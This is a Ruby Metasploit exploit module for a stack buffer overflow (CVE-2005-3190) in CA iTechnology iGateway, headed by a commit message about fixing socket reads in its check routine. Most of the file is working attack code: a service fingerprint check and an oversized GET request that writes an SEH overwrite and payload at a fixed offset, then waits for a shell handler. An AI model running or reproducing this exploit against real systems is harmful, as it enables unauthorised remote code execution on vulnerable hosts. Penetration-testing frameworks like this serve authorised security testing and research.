HD Moore 6e80481384 Fix bad use of sock.get() and check() implementations
Many of these modules use sock.get() when they meant get_once(),
and their HTTP-based checks were broken in some form. The response
to the sock.get() was not being checked against nil, which would
lead to stack traces when the service did not reply (a likely
case given how malformed the HTTP requests were).
2014-06-28 16:05:05 -05:00


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
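class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh

  # Stack overflow in CA iTechnology iGateway (CVE-2005-3190), reachable only
  # when the non-default <Debug>True</Debug> setting is present in igateway.conf.
  # The overwrite is SEH based; the single target uses a pop/pop/ret gadget in
  # xerces-c_2_1_0.dll.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CA iTechnology iGateway Debug Mode Buffer Overflow',
      'Description'    => %q{
          This module exploits a vulnerability in the Computer Associates
        iTechnology iGateway component. When <Debug>True</Debug> is enabled
        in igateway.conf (non-default), it is possible to overwrite the stack
        and execute code remotely. This module works best with Ordinal payloads.
      },
      'Author'         => 'patrick',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-3190' ],
          [ 'OSVDB', '19920' ],
          [ 'URL', 'http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485' ],
          [ 'EDB', '1243' ],
          [ 'BID', '15025' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          # Everything after the SEH record, inside the 5000-byte request path,
          # is available to the payload; CR/LF/space/NUL would end or mangle the
          # request line, hence the bad characters.
          'Space'           => 1024,
          'BadChars'        => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
          'Compat'          =>
            {
              'ConnectionType' => '+ws2ord',
            },
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'iGateway 3.0.40621.0', { 'Ret' => 0x120bd9c4 } ], # p/p/r xerces-c_2_1_0.dll
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Oct 06 2005',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(5250),
      ], self.class)
  end

  # Fingerprint the listener by the error text iGateway returns for a HEAD
  # request. This only identifies the service; it cannot tell whether the
  # debug mode that makes the overflow reachable is enabled, so the strongest
  # result reported is Detected.
  #
  # Returns:
  #   CheckCode::Detected - the iGateway-specific error banner was seen
  #   CheckCode::Unknown  - no data came back before the read timeout
  #   CheckCode::Safe     - the service answered with something else
  #
  # The socket is always released, including when an exception escapes.
  def check
    connect
    sock.put("HEAD / HTTP/1.0\r\nHost: #{rhost}\r\n\r\n")

    # get_once (not get) returns nil when nothing arrives before the read
    # timeout; a silent service is not evidence either way.
    banner = sock.get_once
    return Exploit::CheckCode::Unknown if banner.nil?

    if banner =~ /GET and POST methods are the only methods supported at this time/ # Unique?
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  ensure
    disconnect
  end

  # Send one oversized GET request line. The SEH record (nSEH, SEH, payload)
  # is written at offset 1082 of a 5000-byte alphanumeric filler, which is
  # where the stack handler lies for the supported target.
  def exploit
    connect

    seh    = generate_seh_payload(target.ret)
    buffer = Rex::Text.rand_text_alphanumeric(5000)
    # Offset 1082: distance from the start of the request path to the SEH
    # record on the target build; alphanumeric filler avoids the bad chars.
    buffer[1082, seh.length] = seh

    sploit = "GET /" + buffer + " HTTP/1.0"
    sock.put(sploit + "\r\n\r\n\r\n")

    # The request itself is fire-and-forget; nothing useful comes back on
    # this socket, so release it before waiting for the payload handler.
    disconnect
    handler
  end
end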